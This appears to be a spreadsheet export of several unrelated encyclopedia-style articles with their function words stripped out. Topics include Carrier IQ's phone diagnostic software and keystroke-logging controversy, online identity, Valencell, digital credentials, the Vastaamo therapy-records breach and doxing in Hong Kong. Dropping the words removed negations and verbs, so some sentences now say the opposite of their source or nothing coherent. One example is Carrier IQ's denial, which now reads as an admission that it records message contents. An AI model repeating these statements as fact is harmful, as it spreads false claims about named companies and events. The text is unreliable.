network performance monitoring diagnostic tools. whenever mobile device uploads data, agent also download profile change selection metrics gathered. agent first shipped 2006 embedded feature phones since implemented numerous devices operating systems, including smartphones (android, rim, iphone), modems tablets. msip (mobile service intelligence platform) refers backend carrier software receives mobile device diagnostic data directly mobile devices containing agent software. platform aggregates data many devices produces kpis (key performance indicators) network operators mobile device manufacturers assess quality services provide troubleshoot mobile device network problems. analytics domains msip components enable system calculate specific kpis. carrier iq's first analytics domains cdma signaling, later implementing umts (third-generation mobile cellular technology networks), standard marketed lte) device-specific domains device stability, battery application performance. insight suite applications gathers, analyzes presents kpis generated msip web-based (graphical user interface). application delivers data geospatial tabular view issues (such dropped calls no-service conditions) allows cross-domain analysis kpis. care dashboard tool network operator mobile device customer care agents. when mobile device user calls support troubleshooting, care provides customer care agent dashboard showing consumer's device configurations (e.g., mobile device serial number, firmware version), usage history (e.g., number applications installed, battery life) user experience metrics (e.g., device application crash data, radio technology analytics). rootkit discovery media attention november 2011, researcher trevor eckhart stated post androidsecuritytest.com carrier logging information location without notifying users allowing out, information tracked included detailed keystroke logs, potentially violating federal law. november 2011, carrier sent eckhart cease desist letter claiming copyright infringement posting carrier training documents website also making "false allegations." eckhart sought received backing user rights advocacy group electronic frontier foundation (eff). november 2011, carrier backed apologized. statement apology, carrier denied allegations keystroke logging forms tracking, offered work eff.on november 2011, eckhart published youtube video demonstrates carrier software logging, plain text, variety keystrokes. included demonstration clear-text captures passwords otherwise secure websites, activities performed cellular network disabled. video demonstration showed carrier iq's software processing keystrokes, browser data, text messages' contents, indication information processed recorded transmitted. carrier responded statement, "the metrics tools derive designed deliver information, intention developing tools." datasheet product called experience manager carrier iq's public website clearly states carriers "capture vast array experience data including screen transitions, button presses, service interactions anomalies". legal actions carrier many already seeking suit carrier including: commonwealth massachusetts (criminal civil) united states department justice (criminal) federal trade commission (civil) sprint nextel (civil) t-mobile (civil) jmlecs umbrella companies (criminal civil) hagens berman, california, class action (unknown) detection removal numerous apps released detect carrier detecting carrier normally require device rooted. removal process advanced requires user root device, unlock device's boot loader (applies nexus devices) order remove rooting device void warranty, since system files modified. updates december 2011, carrier released document explain software uses. document titled "understanding carrier technology". there credits given rosenberg trevor eckhart. nineteen-page document provides technical breakdown software mobile phone works "profiles" provided carrier give carriers performance data networks devices running them. document appears updated regular basis questions answered time. december 2011, carrier issued "clarification" november statements: "while individuals identified great deal information available carrier software inside handset, software record, store transmit contents messages, email, photographs, audio video. example, understand whether sent accurately, record transmit content sms. know applications draining battery, capture screen condition contracts operators, carrier operates exclusively within framework laws applicable jurisdiction. data gather transmitted encrypted channel secured within customers' networks audited customer-approved facilities carrier acts agent operators. each implementation different diagnostic information actually gathered determined customers mobile operators. carrier gather data devices. carrier consumer advocate mobile operator, explaining works work. three main complaints hear mobile device users dropped calls, poor customer service, constantly recharge device. software allows operators figure problems occurring, calls dropped, extend life battery. when user calls complain problem, software helps operators' customer service quickly identify specific issue phone."there debate whether carrier software actually sends collected data real time stored phone gets read later. company clearly states page software able provide real-time data: "carrier iq's mobile service intelligence solution eliminates guesswork automatically providing accurate, real-time data direct source customers' handsets.".in february 2012, telecomtv, association carrier filmed panel discussion/debate titled, 'the data dilemma' addressing question: operators collect user data benefit customer commercial financial betterment? participants videotaped panel discussion mike short, vice president, telefónica europe; dean bubley, founder, disruptive analysis; charlotte patric, principal analyst, gartner; martyn warwick, moderator, telecomtv. 2012, carrier appointed chief privacy officer: magnolia mobley, formerly verizon's lead privacy counsel. this news spurred round articles discussions privacy mobile communications.in february 2015, users began reporting carrier agent software overriding device settings order obtain location information even turned off. analytics carrier generally speaking, analytics companies collect, synthesize, present aggregated user information customers help reduce maintenance costs, increase revenue, improve performance particular product. mobile analytics provide customers telemetry. telemetry important contains solutions related mobile telephone services. instance, particular application mobile device crashes, logs sent showing specific details issue. also possible telemetry related mobile handset user webpage views click behavior also included problems carrier iq's clarification while contents messages kept private, clarification states, simple reporting success failure transmission provides valuable information customer habits would normally available outside cellular network itself. because information transmitted regular basis, internet service provider able entries named.log file resides name server times user affected phone connected internet wifi. this method connecting extremely common, many users seek keep cellular data charges possible also utilizing home corporate wireless networks. likely privacy violation targeted marketing home company's internet service provider. examples possible targeted marketing include offering competing phone plans, android apps facilitate additional sales, television guides, even hardware sales, like faster integrated wifi routers. short, carrier works, even company acts best intentions, software betrays users leaking information outside control either carrier affected user's phone company. distribution december 2011, at&amp;t, sprint, t-mobile confirmed phones. sprint said, collect enough information understand customer experience devices network address connection problems, cannot look contents messages, photos, videos, etc., using tool information collected sold provide direct feed data anyone outside sprint." verizon four biggest u.s. firms installed phones.apple, htc, samsung said software installed phones. apple said quit supporting application said, "with diagnostic data sent apple, customers must actively opt-in share information never recorded keystrokes, messages personal information diagnostic data plans ever so." said would scrub software phones future release. (whose android phone subject eckhart's video) said, required devices "number u.s. carriers." added important note customer partner carrier receive data application, company, carriers partner carrier iq."nokia research motion (now blackberry ltd) said carrier categorically authorized phones.according company's website software also installed mobile devices, company partnership vodafone portugal.although phone manufacturers carriers large software strictly used monitor phone systems used third parties, press release october 2011 touted partnership nielsen company. press release said, "together, deliver critical insights consumer experience mobile phone tablet users worldwide, adhere nielsen's measurement science privacy standards. this alliance leverage carrier iq's technology platform gather actionable intelligence performance mobile devices networks." government response december 2011, senator franken, chairman united states senate judiciary subcommittee privacy, technology sent letter lenhart asking answers questions asking whether company violation electronic communications privacy act, including federal wiretap statute u.s.c. 2511 seq.), register statute 3121 seq.), stored communications u.s.c. 2701 seq.) computer fraud abuse u.s.c. 1030).a request freedom information "any manuals, documents written guidance used access analyze data gathered programs developed deployed carrier denied, citing pending enforcement proceeding. this speculation using data obtained carrier investigations. security responses fortinet deemed carrier security risk/rootkit, using definition riskware/carrieriq!android.paper shared senate clarifying solution 2011. also mobile analytics mobile phone tracking mobile mobile security mobile device references external links security researcher responds carrieriq video proof keylogging- geek.com archived 2012-07-01 wayback machine</t>
  </si>
  <si>
    <t>Valencell</t>
  </si>
  <si>
    <t>valencell us-based biometric technology company develops biometric sensor technology wearables hearables, provides patent-protected technology consumer electronics manufacturers various industries. valencell's performtek technology enables wearables hearables continuously measure biometrics heart rate, blood oxygen levels, blood pressure, heart rate variability, respiration rate, parameters health fitness assessment. technology integrated products designed consumer electronics manufacturers, mobile device accessory makers, medical device, sports fitness, hearing companies. valencell patents granted, plus patents pending. more companies utilize valencell's technology intellectual property, commercialized wearable devices made companies including bose, suunto, jabra, samsung, sony. history valencell co-founded team scientists engineers president steven leboeuf, engineering jesse tucker product management mike aumer, augmented talent since company formed 2006. since inception, company million government grants raised million venture funding investor firms joshua fund, tech, ventures. june 2018, valencell raised $10.5m sonion existing investors. biometrics september 2014, valencell opened valencell biometrics lab, exercise science designed test biometric wearables hearables intended cases. biometrics tests different devices various manufacturers year analyzes million biometric data points monthly basis. volunteers test wearable devices distinctive testing protocols ranging hard intervals easy lifestyle efforts. references</t>
  </si>
  <si>
    <t>Online credentials for learning</t>
  </si>
  <si>
    <t>online credentials learning digital credentials offered place traditional paper credentials skill educational achievement. they directly linked accelerated development internet communication technologies, development digital badges, electronic passports massive open online courses (moocs). history online credentials origin concept open educational resources (oer), invented forum open courseware higher education developing countries held 2002 unesco. over next decade concept gained significant traction, confirmed world open educational resources (oer) congress organized unesco 2012. outcomes congress encourage open licensing educational materials produced public funds. creative commons licensing provides necessary standardization copyright permissions, strong emphasis shift towards sharing open licensing. digital credentials ecosystem digital credentials ecosystem made combination traditional (better established) systems flexible dynamic (less regulated new) systems. challenge recognition learning pace development, also point departure, aspects different. system made seven interrelated sectors groups stakeholders, anchored specific functions digital credentials environment. use. these users credentials, notably learners, placed centre system. providers employers also users. provide. referring education training institutions emerging variety for-profit non-profit digital platforms, coursera, futurelearn, credley, verifdiploma mozilla. award. awarding bodies traditional sense institutions professional bodies. employers, moocs, instances also owners/hosts digital platforms global also considered. quality assure. lack quality assurance poses significant threat credibility digital credentials, sets constraints flexibility traditional degrees. evaluate. evaluation credentials owned credential evaluation agencies, enic-naric network qualifications authorities. verify. range public private verification agencies emerged last five years increased attributed affordances related digitization credentials. convene. international agencies open communities networks role play within context. test-based credentials test-based credentials gained popularity online market, programming highly technical tasks. these credentials earned taking multiple-choice project-based tests various skill areas. digital badges digital badges allow individuals demonstrate skills, educational accomplishments, online course completion anything else badge creator decides. 2011, mozilla foundation began development open technical standard called open badges common framework issuance, collection, display image files embedded metadata used verify information contained within badge. open badges standard currently maintained global million open badges issued 2020.in europe, since 2000, work cedefop adoption 2009 european guidelines validating non-formal informal learning supported development policies programmes periodically monitored european inventory validation non-formal informal learning.badges support capturing translating learning across contexts; encouraging motivating participation learning outcomes; formalizing enhancing existing social aspects informal interest-driven learning. digital badges dissimilar concept europass digital badges used portable independently verifiable expressions existing accredited credentials, used represent types recognition unassociated traditional quality assurance bodies. online certificates among alternative credentials, online certificates currently command highest value, nearly comparable traditional degree. earning online certificate online college, company industry-specific organization typically much involved credentials. certificates often connected specific functions. many certificates created companies cisco, microsoft meet needs needs customers.online certificates also used many higher education institutions dematerialize official diplomas acquired skills, using blockchain technologies. future developments future challenges concept identified include issuing earning process badges quality-assured; centralization not) badge-issuing process legitimacy organization takes charge badge issuers using open standard ensure learners stay control badges remain interoperable; badges used recognized education institutions, enterprises individuals. also distance education educational research educational technology open educational resources sources this article incorporates text free content work. licensed cc-by-sa license statement/permission. text taken level-setting recognition learning outcomes: level descriptors twenty-first century, 129-131, keevey, james, unesco. unesco. learn open license text wikipedia articles, please how-to page. information reusing text wikipedia, please terms use. references</t>
  </si>
  <si>
    <t>Online identity management</t>
  </si>
  <si>
    <t>online identity management (oim), also known online image management, online personal branding, personal reputation management (prm), methods generating distinguished presence person internet. online identity management also refers identity exposure identity disclosure, particularly developed management online identity social network services online dating services. aspects aspect online identity management process improving quantity quality traffic sites content related person. aspect, part another discipline called search engine optimization difference keyword person's name, optimization object necessary single site; consider completely different sites contain positive online references. objective case high rankings many sites possible someone search person's name. search engine used google, action called google someone".another aspect impression management, i.e. "the process people control impressions people form them". objectives, particular, increase online reputation person. pseudonyms sometimes used protect true online identity individuals harm. this case presenting unpopular views dissenting opinion online affect true identity author. facebook estimates 11.2% accounts fake. many profiles used logins protect true identity online authors.an individual's presence could reflected kind content refers person, including news, participation blogs forums, personal sites, social media presence, pictures, video, etc. because that, online identity management often involves participation social media sites like facebook, google+, linkedin, flickr, youtube, twitter, last.fm, myspace, quora, tumblr, pinterest online communities community websites, related blogging, blog social networks like mybloglog blog search engines like technorati. serve specific purposes professional networking platform. platforms represent user attributes bring world. information user plug profile usually verified, lead specifics forms false identity. also consist questionable practices case buying "likes", "friends", "subscribers". objective objective online identity management maximize appearances positive online references specific person, targeting users actively search person search engine, also eventually reach person's reference browsing web. build online identity case person's presence minimal nonexistent. solve online reputation problems. case, process also named online reputation management. express opinions unheard, person's reputation previously favored.online identity management utilized personal professional level. online identity management utilizes presence gain attention potential huge clients followers. person managing online identity social media sites like twitter, facebook, instagram youtube, snapchat, networking sites increase online activity. they also tools like search engine optimization advertisements boost audience gain insights audience. online identity management effective social networking sites posting frequently. this technique used target audience make sure audience miss content. additionally, online identity management used manipulate followers, viewers, clients using misleading over-exaggerated information. motivation reason someone would interested online identity management closely related increasing number constituencies internet tool find information people. survey careerbuilder.com found four hiring managers used search engines screen candidates. also checked candidates' profiles social networking sites facebook, instagram, twitter, youtube communicative networks. according december 2007 survey ponemon institute, privacy research organization, roughly half u.s. hiring officials internet vetting applications. online identity management also used increase individual's professional online presence. when practicing online identity management, employers receive satisfied notion regarding candidate's professional attitudes personality. this result candidate receiving based professional online presence. online identity management successful business relationship public. online presence vital digital world live today. many employers check social network account candidate grasp kind person are. even hired companies continuously check account ensure professionalism company privacy maintained.the concept manipulating search results show positive results intriguing individuals businesses. individuals want hide past repair online image suppress content damages credibility, employability reputation. changing people searching individual, able create completely positive identity place. 2014, ruled people "the right forgotten", circumstances content removed google's search index. 1988, european union passed safe harbor prohibited sharing unauthorized personal information. many companies voluntarily comply law; however, user fully ensure safety online identity. european union later passed landmark ruling back 2014, stated individuals "right forgotten". this granted user's removal irrelevant data could harm one's online identityonline identity management also factor important person seeking need good. depending companies online viewers content encourage discourage sale. online identity management important decisions made depending online activity. depending motives goods, company, person online identity serve purpose heightening likeness, attractiveness, exposure. also references</t>
  </si>
  <si>
    <t>Online identity</t>
  </si>
  <si>
    <t>internet identity (iid), also online identity internet persona, social identity internet user establishes online communities websites. also actively constructed presentation oneself. although people choose real names online, internet users prefer anonymous, identifying means pseudonyms, reveal varying amounts personally identifiable information. online identity even determined user's relationship certain social group part online. some deceptive identity. online contexts, including internet forums, online chats, massively multiplayer online role-playing games (mmorpgs), users represent visually choosing avatar, icon-sized graphic image. avatars users express online identity. through interaction users, established online identity acquires reputation, enables users decide whether identity worthy trust. online identities associated users authentication, typically requires registration logging some websites also user's address tracking cookies identify users.the concept self, influenced emerging technologies, subject research fields education, psychology sociology. online disinhibition effect notable example, referring concept unwise uninhibited behavior internet, arising result anonymity audience gratification. online social identity identity expression identity exposure social web, i.e. usage support social process, represents space people possibility express expose identity social context. example, people define identity explicitly creating user profiles social network services facebook linkedin online dating services. expressing opinions blogs social media, define tacit identities. disclosure person's identity present certain issues related privacy. many people adopt strategies help control disclosure personal information online. some strategies require users invest considerable effort. emergence concept online identity raised many questions among academics. social networking services online avatars complicated concept identity. academia responded emerging trends establishing domains scholarly research technoself studies, focuses aspects human identity technological societies. online activities affect offline personal identity, well. marciano coined term "virtureal" resolve contested relationship online offline environments relation identity formation. studying online usage patterns transgender people, suggested internet used preliminary, complementary, and/or alternative sphere. concludes although "the offline world sets boundaries potentially limit latitude within online world, boundaries wide enough allow mediated agency empowers transgender users. consequently, term virtureal "reflects fact provides empowering virtual experience compensates offline social inferiority, fact nevertheless subject offline restrictions". concept mask dorian wiszniewski richard coyne, contribution book building virtual communities, explore online identity, emphasis concept "masking" identity. they whenever individual interacts social sphere, portray mask identity. this different online becomes even pronounced decisions online contributor makes concerning online profile. must answer specific questions age, gender, address, username forth. with accrual one's online activity, mask increasingly defined style writing, vocabulary topics. kind mask chooses reveals something subject behind mask, might referred "metaphor" mask. online mask reveal actual identity person; reveals example lies behind mask. person chooses like rock star online, metaphor reveals interest rock music also indicate lack self-esteem. person also choose craft fake identity, whether entirely fictional, already existence, borrowed, stolen. because many emotional psychological dynamics, people reluctant interact online. evoking mask identity, person create safety net. anonymous fake identity precaution people take true identity stolen abused. making mask available, people interact degree confidence without fear. wiszniewski coyne state, "education seen change process identity realized, finds one's place. education implicates transformation identity. education, among things, process building sense identity, generalized process edification." students interacting online community must reveal something others respond contribution. manner, mask constantly formulated dialogue others thereby students gain richer deeper sense are. there process edification help students come understand strengths weaknesses. blended identity blended mask perspective likened concept 'blended identity', whereby offline-self informs creation online-self, turn informs offline-self interaction individual first online. means people's self-identity varies different social cultural contexts. different contexts blogging blogs allow individual express views individual essays part wider discussion, creates public forum expressing ideas. bloggers often choose pseudonyms, whether platforms wordpress interest-centered blog sites, protect personal information allow editorial freedom express ideas might unpopular family, employers, etc. pseudonym (and judicious approach revealing personal information) allow person protect real identities, still build reputation online using assumed name. human resources digital identity management become necessity applying jobs working company. social media tool human resources years. kpmg report social media human resources percent american companies used linkedin recruiting. ease search means reputation management become vital especially professional services lawyers, doctors accountants. social networks online social networks like facebook myspace allow people maintain online identity overlap online real-world context. these identities often created reflect specific aspect ideal version themselves. representations include pictures, communications 'friends' membership network groups. privacy control settings social networks also part social networking identity.some users online identity extension physical selves, center profiles around realistic details. these users value continuity identity, would prefer honest portrayal themselves. however, also group social network users would argue using real identity online. these users experimented online identity, ultimately found possible create alternate identity usage social networks. example, popular blogger medium.com writes name campbell name chosen her, given her. states verbally attacked online another user, able protect sting insult taking kel, rather true self. became shield sorts, acted mask freed real user beneath research scientists danah boyd knut lundby found cultures, ability form identity online considered sacred privilege. this online identity allows user accomplish things otherwise impossible real life. these cultures believe self become subjective concept online spaces; logging onto profiles, users essentially freed prison physical body "create narrative self virtual space entirely new". online business development social networks, appeared economic phenomenon: business social networks. example, many users wechat called wei-businessmen (wechat businessman, form e-commerce wechat) sell products wechat. doing business social networks easy. identities users social networks real world. sake security, people tend trust someone social networks, particular related money. wei-businessmen, reputations important wei-business. once customers decide shop wechat, prefer choose wei-businessmen high reputations. they need invest enormous efforts gain reputations among users wechat, turn increases chance users purchase them. online learning communication online identity classrooms forces people reevaluate concepts classroom environments. with invention online classes, classrooms changed longer traditional face-to-face communications. these communications replaced computer screen. students longer defined visual characteristics unless make known. there pros cons side. traditional classroom, students able visually connect teacher standing room. during class, questions arise, clarification provided immediately. students create face-to-face connections students, connections easily extended beyond classroom. timid socially awkward students, ability form extend relationships personal contact hold little appeal. students, appeal reside online courses, computer communications allow greater degree separation anonymity.with prevalence remote internet communications, students form preconceptions classmates based classmate's appearance speech characteristics. rather, impressions formed based information presented classmate. some students comfortable paradigm avoids discomfort public speaking. students feel comfortable stating ideas class take time think exactly wish say.communication written media lead students take time think ideas since words permanent setting (online) conversations carried class. perception professor online learning situations also cause shift perception professor. whereas anonymity help students achieve greater level comfort, professors must maintain active identity students interact. students feel professor ready help whenever need although students professors able meet person, emails correspondence occur timely manner. without students tend drop online classes since seems wandering course without anyone guide them. virtual world virtual world, users create personal avatar communicate others virtual identity. virtual personal figure voice draw real figure fantasy worlds. virtual figure degree reflects personal expectation, users adopt different personality virtual world reality. internet forum internet forum, message board, online discussion site people hold conversations form posted messages. there many types internet forums based certain themes groups. properties online identities also differ different type forums. example, users university usually know others reality since users students professors university. however freedom expression limited since university bbss control school administration identities related student ids. another hand, question-and-answer websites like "zhihu" china open public users create accounts e-mail address. describe specialties personal experiences show reliability certain questions, users also invite answer questions based profiles. answers profiles either real-name anonymous. benefits concerns benefits discussed positive aspect virtual communities people present without fear persecution, whether personality traits, behaviors curious about, announcement real world identity component never announced. this freedom results opportunities society whole, especially ability people explore roles gender sexuality manner harmless, interesting helpful undertaking change. online identity given people opportunity feel comfortable wide-ranging roles, underlying aspects user's life user unable portray real world.online identity beneficial effect minority groups, including racial ethnic minority populations people disabilities. online identities help remove prejudices created stereotypes found real life, thus provide greater sense inclusion. example opportunities establishment many communities welcoming lgbtq+ teenagers learning understand sexuality. these communities allow teenagers share experiences another older members lgbtq+ community, provide non-threatening non-judgmental safe place. review community, silberman quotes information technology worker, reilly, stating: "the wonderful thing online services intrinsically decentralized resource. kids challenge adults make news". teen organizers successful anywhere, news readily available. internet arguably powerful tool young people alternative sexualities ever had.the online world provides users choice determine sex, sexuality preference sexual characteristics would like embody. online encounter, user essentially opportunity interchange identity would like portray. mcrae argues surkan (2000), "the lack physical presence infinite malleability bodies complicates sexual interaction singular way: choice gender "option" rather strictly defined biological characteristic, entire concept gender primary marker identity becomes partially subverted." online identity offer potential social benefits physical sensory disabilities. flexibility online media provides control disclosure impairment, opportunity typically available real world social interactions. researchers highlight value improving inclusion. however, affordance normalization offers possibility experiencing non-stigmatized identities also offering capacity create harmful dangerous outcomes, jeopardize participants' safety. concerns primarily, concerns regarding virtual identity revolve around areas misrepresentation contrasting effects offline existence. sexuality sexual behavior online provide controversial debate many concerned predatory nature users. this particularly reference concerns child pornography ability pedophiles obscure identity.the concerns regarding connection offline lives challenged notions constitutes real experience. reference gender, sexuality sexual behavior, ability play ideas resulted questioning virtual experience affect one's offline emotions. mcrae states, virtual complicates drastically unsettles division mind, body, self become comfortable truism western metaphysics. when projected virtuality, mind, body self become consciously-manufactured constructs individuals interact other. reliability identities people define social necessarily facets offline self. studies show people online dating services. case social network services facebook, companies proposed sell "friends" increase user's visibility, calling question reliability person's social identity.van gelder reported incident occurring computer conferencing system early male psychiatrist posed julie, female psychologist multiple disabilities including deafness, blindness, serious facial disfigurement. julie endeared computer conferencing community, finding psychological emotional support many members. psychiatrist's choice present differently sustained drawing upon unbearable stigma attached julie's multiple disabilities justification meeting face-to-face. lack visual cues allowed identity transformation continue, psychiatrist also assuming identity julie's husband, adamantly refused allow anyone visit julie claimed seriously ill. this example highlights ease identity constructed, transformed, sustained textual nature online interaction visual anonymity affords. catfishing online catfishing user create fake online profile, sometimes fake photos information, order enter relationship, intimate platonic, another user. catfishing became popular mainstream culture reality show catfish. identity management infrastructures problem facing anyone hopes build positive online reputation reputations site-specific; example, one's reputation ebay cannot transferred slashdot. multiple proposals made build identity management infrastructure protocols. require effective public infrastructure identity separate manifestations online identity (say, wikipedia another twitter) probably same. openid, open, decentralized standard authenticating users used access control, allowing users different services digital identity. these services must allow implement openid. context collapse context collapse describes phenomena occurrence multiple social groups space causes confusion manage one's online identity. this suggests managing identities online, individuals challenged differentiate online expression unmanageable size audience variations. this phenomenon particularly relevant social media platforms. users often connected wide range social groups family, colleagues friends. when posting social media, presence different social groups makes difficult decide aspect one's personality present. term first coined 2003 microsoft researcher danah boyd relation social networking platforms myspace friendster. since 2003, issue context collapse become increasingly significant. users forced implement strategies combat context collapse. these strategies include using stricter privacy settings engaging "ephemeral mediums" instagram stories snapchat posts temporarily accessible less likely permanent consequences effect one's reputation. reputation management given malleability online identities, economists expressed surprise flourishing trading sites, ebay, developed internet. when pseudonymous identities propose enter online transaction, faced prisoner's dilemma: deal succeed parties willing trust other, rational basis successful internet trading sites developed reputation management systems, ebay's feedback system, record transactions provide technical means users rate other's trustworthiness. however, users malicious intent still cause serious problems websites.an online reputation perception generates internet based digital footprint. digital footprints accumulate content shared, feedback provided information created online. fact someone online reputation, easily change pseudonym, accounts sites ebay amazon usually distrusted. individual company wants manage online reputation, face many difficulties. this merchant brick mortar shop usually trusted. relation real-world social constraints ultimately, online identity cannot completely free social constraints imposed real world. westfall (2000, 160) discusses, "the idea truly departing social hierarchy restriction occur internet perhaps suggested earlier research possibilities presented internet) identity construction still shaped others. westfall raises important, rarely discussed, issue effects literacy communication skills online user." indeed, skills lack thereof capacity shape one's online perception shape one's perception physical body "real world." disembodiment implications this issue gender sexual reassignment raises notion disembodiment associated implications. "disembodiment" idea user online, need body longer required, user participate separately this ultimately relates sense detachment identity defined physical body. cyberspace, many aspects sexual identity become blurred defined user. questions truth therefore raised, particularly reference online dating virtual sex. mcrae states, "virtual allows certain freedom expression, physical presentation experimentation beyond one's real-life limits". best, complicates drastically unsettles division mind, body self manner possible construction online identity. legal security issues online identity user's rights future online anonymity depends identity management infrastructure developed. enforcement officials often express opposition online anonymity pseudonymity, view open invitation criminals wish disguise identities. therefore, call identity management infrastructure would irrevocably online identity person's legal identity; proposals, system would developed tandem secure national identity document. eric schmidt, google, stated google+ social network intended exactly identity system. controversy resulting google+'s policy requiring users sign using legal names dubbed "nymwars".online civil rights advocates, contrast, argue need privacy-invasive system technological solutions, reputation management systems, already sufficient expected grow sophistication utility. online predators online predator internet user exploits users' vulnerability, often sexual financial purposes. relatively easy create online identity attractive people would normally become involved predator, fortunately means make sure person actually are. many people trust things style someone writes, photographs someone page identify person, easily forged. long-term internet relationships sometimes difficult sufficiently understand knowing someone's identity actually like.the vulnerable group online predators often considered young teenagers older children. "over time perhaps weeks even months stranger, obtained much personal information possible, grooms child, gaining trust compliments, positive statements, forms flattery build emotional bond." victims often suspect anything late, party usually misleads believe similar age.the show dateline has, overall, conducted three investigations online predators. they adults, posing online teenage juveniles, engage sexually explicit conversations adults (the predators) arrange meet person. instead meeting teenager, unsuspecting adult confronted chris hansen, news correspondent, arrested, shown nationwide television. dateline held investigations five different locations apprehending total all.federal laws passed u.s. assist government trying catch online predators. some include wiretapping, online offenders caught advance, child becomes victim. california, dateline investigation took place, misdemeanor someone sexually-tinged conversations child online. came house charged felony intent obvious. market online identity acquired excellent reputation valuable reasons: first, persons invested great deal time effort build identity's reputation; second, users look identity's reputation decide whether sufficiently trustworthy. therefore unsurprising online identities sale online auction sites. however, conflicts arise ownership online identities. recently, user massively multiplayer online game called everquest, owned sony online entertainment, inc., attempted sell everquest identity ebay. sony objected, asserting character sony's intellectual property, demanded removal auction; terms u.s. digital millennium copyright (dmca), ebay could become party copyright infringement lawsuit failed comply. also notes external links european centre reputation studies</t>
  </si>
  <si>
    <t>VanHacks</t>
  </si>
  <si>
    <t>vanhacks annual hackathon part vancouver startup week. focus hackathon creating solutions local non-profit organizations vancouver area course hours. sponsors event included kpmg, best buy, slack (software), lighthouse labs, nespresso, bull. history vanhacks created 2016 studios. event 2017. 2018 2019 vanhacks partnered vancouver startup week, served official hackathon week long event held september. 2018 2019 versions event held downtown campus bcit (british columbia institute technology). references external links official website vancouver startup week studios</t>
  </si>
  <si>
    <t>Vastaamo data breach</t>
  </si>
  <si>
    <t>vastaamo finnish private psychotherapy service provider founded 2008. october 2020, vastaamo announced patient database hacked. some information used extort service provider clients ended dark net. extorters demanded bitcoins, roughly 450,000 euros, threatened publish records. pressure demands, extorters published hundreds patient records message board. after extortion company failed, extorters sent emails victims demanding ransoms order avoid publishing sensitive personal data. ransom demands sent roughly 30,000 victims. company's security practices found inadequate: sensitive data encrypted anonymized system root defined password. patient records first accessed intruders november 2018, security flaws continued exist march 2019.in december 2021, finnish data protection authority (dpa) fined vastaamo 608,000 euros violating provisions general data protection regulation (gdpr). this cyber-attack became biggest criminal case finland history. also turned international scandal cyber-attack unprecedented scope tactic called double extortion applied cyber criminals. background vastaamo helsinki-based private psychotherapy center founded 2008 provided private mental-health services patients. firm twenty-five therapy centers throughout nordic country million people. vastaamo operated sub-contractor finland’s public health system. ville tapio, ex-ceo vastaamo first heard hacker september 2020. immediately notified various government authorities, including police. october 2020, vastaamo announced confidential treatment records approximately 36,000 psychotherapy patients employees compromised. psychotherapy center received ransom demand 450,000 euros bitcoin. leaked patient database contained psychotherapy clients’ personal information, full names, home addresses, email addresses, social security numbers, names clinics received treatments, therapists’ doctors’ notes session.as company resisted ransom, hacker, using alias “ransom_man,” published therapist session notes least patients, including politicians police officers, using server called tor, public forum. therapist session notes contained information adulterous relationships, suicide attempts, pedophilic thoughts. hacker approached victims security breach directly extortion emails demanding ransoms euros paid bitcoin, amount increased euros unless paid within hours. 10-gigabyte data file containing private notes least 2,000 patients therapists appeared websites “dark web.” patient information stolen attacks, started early 2018. this first intrusion vastaamo's database took place november 2018, systems penetrated november 2018 march 2019. midco, holding company owned intera partners, finnish private equity firm, acquired stake vastaamo 2019. company asked inquiry acquisition also requested acquisition company cancelled purchase price returned failure disclose hacking. ville tapio relieved duties chief executive psychotherapy center october 2020. vastaamo declared bankrupt decision helsinki district court february 2021. early march 2021, staff services transferred verve, provider occupational welfare services. company’s patient database transferred verve. impact security breach shaken societal trust finland's institutions, violated sensitive systems, damaged faith online social networks supposed properly secured. thousands victims suffered anxiety, insecurity, stress traumatic event, psychological effects trauma long-lasting. this created national opportunity public discussion mental health issues. additionally, weak security health-care systems brought surface. this hacking incident wide impact healthcare industry's obligations secure networks increase accountability. security breach served wake-up call finland's cyber security increased preparation digital attacks medical healthcare providers private education institutions. focus balancing availability information data governance increased along investments companies' computer security since hacking incident occurred. result data breach, finnish data protection authority (dpa) started taking violations gdpr seriously increased enforcement activities. outcomes investigations security breach, also sanctions established, serve reference point future legal assessments. responding hack immediately following hack, cabinets finnish government held regular wednesday meeting address cybersecurity issues, create legislation regarding data security identity thefts, promise emergency support victims. more 22,600 victims blackmail 2020 visited victim support finland (riku), organization provides counseling support victims crimes. various finnish organizations quickly established ways help victims, including direct dial-in numbers churches therapy services. organizations provide victim support services include finnish cross, mental health finland, victim support finland evangelical lutheran church finland. additionally, many companies working social security numbers debt collecting taken action help victims whose identities stolen. order rebuild public trust government authorities, finnish central government requested government agencies make sure processing handling personal information secure minimize leakage personal data. additionally, ministries conducted reviews better within departments assure public security personal data. finland's national bureau investigation introduced unprecedented finnish criminal code, person found guilty privacy violation data subject process personal data, either intentionally gross negligence, cause damage significant inconvenience data subject. furthermore, finnish government accelerated legislation allowed citizens change personal identity codes data breach would involve high risk identity theft. references</t>
  </si>
  <si>
    <t>ABA digital signature guidelines</t>
  </si>
  <si>
    <t>digital signature guidelines guidelines published august 1996 american association (aba) section science technology law. authors members section's information security committee. document first overview principles framework digital signatures authentication electronic commerce legal viewpoint, including technologies certificate authorities public infrastructure (pki). guidelines product four-year collaboration lawyers technical experts dozen countries, adopted model legislation states including florida utah. digital signature guidelines followed public infrastructure assessment guidelines published 2003. similar effort undertaken slovenia digital signature working group (within chamber commerce industry slovenia (ccis)). references external links american association</t>
  </si>
  <si>
    <t>Online uncovering in Hong Kong</t>
  </si>
  <si>
    <t>online uncovering, also called doxing, practice revealing private information individual organization gathered online sources. methods include searching public databases, social media email accounts, hacking. when done private individuals form vigilantism. also used enforcement departments. example, helped hong kong police force investigate background information suspects. driven prevalence internet online forums golden forum, online uncovering become social phenomenon hong kong. used shame, harass, tarnish reputation victims. details online uncovering kind cyber bullying. with online uncovering, personal information, like occupation, family members, home address, telephone numbers, victims disclosed without permission, causes great nuisance them. people spread one's information humiliate one, make ashamed infringe one's privacy. also, people tend share videos people's misconduct public internet, stirring discussions debates, also online uncovering people videos. examples method used there various uncovering methods. most cases attributed victims’ mismanagement personal information online. search engine hackers utilize engines google uncover personal information blogs, social networking websites forums. software cracker hackers uncover address targeted person interception software. they also uncover personal information discovering internet services provider address. installing spyware virus computer could misappropriate personal information either easily. social engineering social engineering means hackers tempt target disclose personal information multiple approaches. they also collect gather information cyber friends target. such actions likely breach law. forum some online forums golden forum (betray friends page) encourage netizens post photos fellows. information disclosure forbidden. impacts victims positive side most victims online uncovering something inappropriate, maltreating animals impolite actions. through online uncovering, victims’ inappropriate actions would pointed out. they would realize something wrong make apologies follow actions. just take case maltreating last year example. student city university maltreated hall picture taken posted social networks. after online uncovering, made apology promised maltreatments would happen again. negative side after online uncovering, victims’ personal information would found circulated internet; telephone number, address photos. 